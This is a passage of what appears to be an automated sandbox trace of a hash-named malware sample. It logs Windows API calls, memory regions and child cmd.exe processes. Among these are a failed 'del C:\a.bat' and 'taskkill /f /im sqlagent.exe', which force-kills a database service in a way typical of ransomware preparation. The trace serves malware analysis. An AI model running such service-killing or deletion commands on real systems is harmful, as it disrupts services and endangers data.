returned 14 [0144.568] GetProcessHeap () returned 0x5b0000 [0144.569] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x58) returned 0x5babf0 [0144.569] GetProcessHeap () returned 0x5b0000 [0144.569] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x10) returned 0x5b3f70 [0144.569] GetProcessHeap () returned 0x5b0000 [0144.569] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1c) returned 0x5bac50 [0144.570] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0144.573] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0144.573] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0144.573] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0144.573] GetProcessHeap () returned 0x5b0000 [0144.573] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x30) returned 0x5bac78 [0144.574] GetProcessHeap () returned 0x5b0000 [0144.574] RtlReAllocateHeap (Heap=0x5b0000, Flags=0x0, Ptr=0x5bac78, Size=0x1c) returned 0x5bac78 [0144.574] GetProcessHeap () returned 0x5b0000 [0144.574] RtlSizeHeap (HeapHandle=0x5b0000, Flags=0x0, MemoryPointer=0x5bac78) returned 0x1c [0144.574] GetProcessHeap () returned 0x5b0000 [0144.574] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x24) returned 0x5baca0 [0144.575] GetProcessHeap () returned 0x5b0000 [0144.575] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x30) returned 0x5bacd0 [0144.575] GetProcessHeap () returned 0x5b0000 [0144.575] RtlReAllocateHeap (Heap=0x5b0000, Flags=0x0, Ptr=0x5bacd0, Size=0x1c) returned 0x5bacd0 [0144.576] GetProcessHeap () returned 0x5b0000 [0144.576] RtlSizeHeap (HeapHandle=0x5b0000, Flags=0x0, MemoryPointer=0x5bacd0) returned 0x1c [0144.576] GetProcessHeap () returned 0x5b0000 [0144.576] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1a) returned 0x5bacf8 [0144.576] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x19f818 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0144.576] GetProcessHeap () returned 0x5b0000 [0144.576] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x38) returned 0x5bad20 [0144.576] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x19e888 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0144.576] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x19eabc, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x19eac0, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x19eabc*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0144.577] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0144.577] GetProcessHeap () returned 0x5b0000 [0144.577] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2c) returned 0x5bad60 [0144.577] GetProcessHeap () returned 0x5b0000 [0144.577] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x258) returned 0x5bad98 [0144.577] _wcsicmp (_String1="a.bat", _String2=".") returned 51 [0144.577] _wcsicmp (_String1="a.bat", _String2="..") returned 51 [0144.577] GetFileAttributesW (lpFileName="C:\\a.bat" (normalized: "c:\\a.bat")) returned 0xffffffff [0144.577] GetLastError () returned 0x2 [0144.577] GetProcessHeap () returned 0x5b0000 [0144.577] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x210) returned 0x5b05c8 [0144.577] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x5b05d0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0144.577] SetErrorMode (uMode=0x0) returned 0x8003 [0144.577] SetErrorMode (uMode=0x1) returned 0x0 [0144.577] GetFullPathNameW (in: lpFileName="C:\\a.bat", nBufferLength=0x104, lpBuffer=0x19eee8, lpFilePart=0x19eebc | out: lpBuffer="C:\\a.bat", lpFilePart=0x19eebc*="a.bat") returned 0x8 [0144.577] SetErrorMode (uMode=0x8003) returned 0x1 [0144.578] GetFileAttributesW (lpFileName="C:\\" (normalized: "c:")) returned 0x16 [0144.578] GetProcessHeap () returned 0x5b0000 [0144.578] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x258) returned 0x5b07e0 [0144.578] _wcsicmp (_String1="a.bat", _String2=".") returned 51 [0144.578] _wcsicmp (_String1="a.bat", _String2="..") returned 51 [0144.578] GetFileAttributesW (lpFileName="C:\\a.bat" (normalized: "c:\\a.bat")) returned 0xffffffff [0144.578] GetLastError () returned 0x2 [0144.578] GetProcessHeap () returned 0x5b0000 [0144.578] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x14) returned 0x5b7758 [0144.578] GetProcessHeap () returned 0x5b0000 [0144.578] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x10) returned 0x5baff8 [0144.578] GetProcessHeap () returned 0x5b0000 [0144.579] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x10) returned 0x5bb010 [0144.579] GetProcessHeap () returned 0x5b0000 [0144.579] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x808) returned 0x5b7cd8 [0144.579] FindFirstFileExW (in: lpFileName="C:\\a.bat", fInfoLevelId=0x0, lpFindFileData=0x5b7ce4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5b7ce4) returned 0xffffffff [0144.579] GetLastError () returned 0x2 [0144.579] _get_osfhandle (_FileHandle=2) returned 0x130 [0144.579] GetFileType (hFile=0x130) returned 0x2 [0144.579] GetStdHandle (nStdHandle=0xfffffff4) returned 0x130 [0144.579] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0x19f4bc | out: lpMode=0x19f4bc) returned 0 [0144.579] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0xf47940, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0144.581] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0xf47940, nSize=0x2000, Arguments=0x19f53c | out: lpBuffer="Could Not Find C:\\a.bat\r\n") returned 0x19 [0144.581] _get_osfhandle (_FileHandle=2) returned 0x130 [0144.581] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Could Not Find C:\\a.bat\r\n", cchWideChar=-1, lpMultiByteStr=0xf4b960, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Could Not Find C:\\a.bat\r\n", lpUsedDefaultChar=0x0) returned 26 [0144.582] WriteFile (in: hFile=0x130, lpBuffer=0xf4b960*, nNumberOfBytesToWrite=0x19, lpNumberOfBytesWritten=0x19f4dc, lpOverlapped=0x0 | out: lpBuffer=0xf4b960*, lpNumberOfBytesWritten=0x19f4dc*=0x19, lpOverlapped=0x0) returned 1 [0144.582] GetProcessHeap () returned 0x5b0000 [0144.582] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5bb010) returned 1 [0144.582] GetProcessHeap () returned 0x5b0000 [0144.582] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5b7758) returned 1 [0144.582] GetProcessHeap () returned 0x5b0000 [0144.582] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5baff8) returned 1 [0144.582] GetProcessHeap () returned 0x5b0000 [0144.582] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5b7cd8) returned 1 [0144.583] GetProcessHeap () returned 0x5b0000 [0144.583] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5b07e0) returned 1 [0144.583] GetProcessHeap () returned 0x5b0000 [0144.583] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5b05c8) returned 1 [0144.583] GetProcessHeap () returned 0x5b0000 [0144.583] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5bad98) returned 1 [0144.583] GetProcessHeap () returned 0x5b0000 [0144.584] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5bad60) returned 1 [0144.584] GetProcessHeap () returned 0x5b0000 [0144.584] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5bad20) returned 1 [0144.584] GetProcessHeap () returned 0x5b0000 [0144.584] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5bacf8) returned 1 [0144.584] GetProcessHeap () returned 0x5b0000 [0144.584] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5bacd0) returned 1 [0144.584] _get_osfhandle (_FileHandle=1) returned 0x158 [0144.584] SetConsoleMode (hConsoleHandle=0x158, dwMode=0x0) returned 0 [0144.584] _get_osfhandle (_FileHandle=1) returned 0x158 [0144.584] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0144.584] _get_osfhandle (_FileHandle=0) returned 0x154 [0144.584] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0144.584] GetConsoleOutputCP () returned 0x1b5 [0144.586] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0144.586] SetThreadUILanguage (LangId=0x0) returned 0x409 [0144.587] exit (_Code=0) Thread: id = 124 os_tid = 0xfd0 Process: id = "10" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x7a9f0000" os_pid = "0x3a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im sqlagent.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1265 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1266 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1267 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1268 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1269 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1270 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1271 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1272 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1273 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1274 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1275 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 1276 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1277 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1278 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1279 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1280 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 1281 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1282 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 1283 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1284 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1285 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1286 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1287 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1288 start_va = 0x540000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1289 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1290 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1291 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1292 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1293 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1294 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1295 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1296 start_va = 0x6b0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 1297 start_va = 0x7b0000 end_va = 0x91ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 1298 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1299 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1300 start_va = 0x920000 end_va = 0xc56fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 125 os_tid = 0xdc4 [0144.890] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0144.890] __set_app_type (_Type=0x1) [0144.890] __p__fmode () returned 0x74974d6c [0144.890] __p__commode () returned 0x74975b1c [0144.890] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0144.890] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0144.890] GetCurrentThreadId () returned 0xdc4 [0144.891] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xdc4) returned 0x78 [0144.891] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0144.891] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0144.891] SetThreadUILanguage (LangId=0x0) returned 0x409 [0144.900] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0144.900] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0144.900] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.900] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0144.901] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0144.901] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.901] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0144.901] GetConsoleOutputCP () returned 0x1b5 [0144.903] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0144.903] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0144.903] _get_osfhandle (_FileHandle=1) returned 0x154 [0144.903] SetConsoleMode (hConsoleHandle=0x154, dwMode=0x0) returned 0 [0144.903] _get_osfhandle (_FileHandle=1) returned 0x154 [0144.903] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0144.903] _get_osfhandle (_FileHandle=0) returned 0x144 [0144.903] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0144.903] GetEnvironmentStringsW () returned 0x5b7cc0* [0144.903] GetProcessHeap () returned 0x5b0000 [0144.903] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa1a) returned 0x5b86e8 [0144.904] FreeEnvironmentStringsA (penv="A") returned 1 [0144.904] GetProcessHeap () returned 0x5b0000 [0144.904] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x4) returned 0x5b0550 [0144.904] GetEnvironmentStringsW () returned 0x5b7cc0* [0144.904] GetProcessHeap () returned 0x5b0000 [0144.904] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa1a) returned 0x5b9110 [0144.904] FreeEnvironmentStringsA (penv="A") returned 1 [0144.904] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0144.905] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0144.905] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0144.905] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0144.905] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0144.905] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0144.905] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0144.905] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0144.905] RegCloseKey (hKey=0x88) returned 0x0 [0144.905] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0144.905] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0144.905] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0144.905] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0144.906] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0144.906] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0144.906] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0144.906] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0144.906] RegCloseKey (hKey=0x88) returned 0x0 [0144.906] time (in: timer=0x0 | out: timer=0x0) returned 0x623441ff [0144.906] srand (_Seed=0x623441ff) [0144.906] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im sqlagent.exe \"" [0144.906] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im sqlagent.exe \"" [0144.906] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0144.906] GetProcessHeap () returned 0x5b0000 [0144.906] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x210) returned 0x5b9b38 [0144.906] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5b9b40, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0144.907] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0144.907] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0144.907] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0144.907] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0144.907] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0144.907] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0144.907] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0144.907] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0144.907] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0144.907] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0144.907] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0144.907] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0144.908] GetProcessHeap () returned 0x5b0000 [0144.908] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5b86e8) returned 1 [0144.908] GetEnvironmentStringsW () returned 0x5b7cc0* [0144.908] GetProcessHeap () returned 0x5b0000 [0144.908] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa32) returned 0x5ba790 [0144.908] FreeEnvironmentStringsA (penv="A") returned 1 [0144.908] 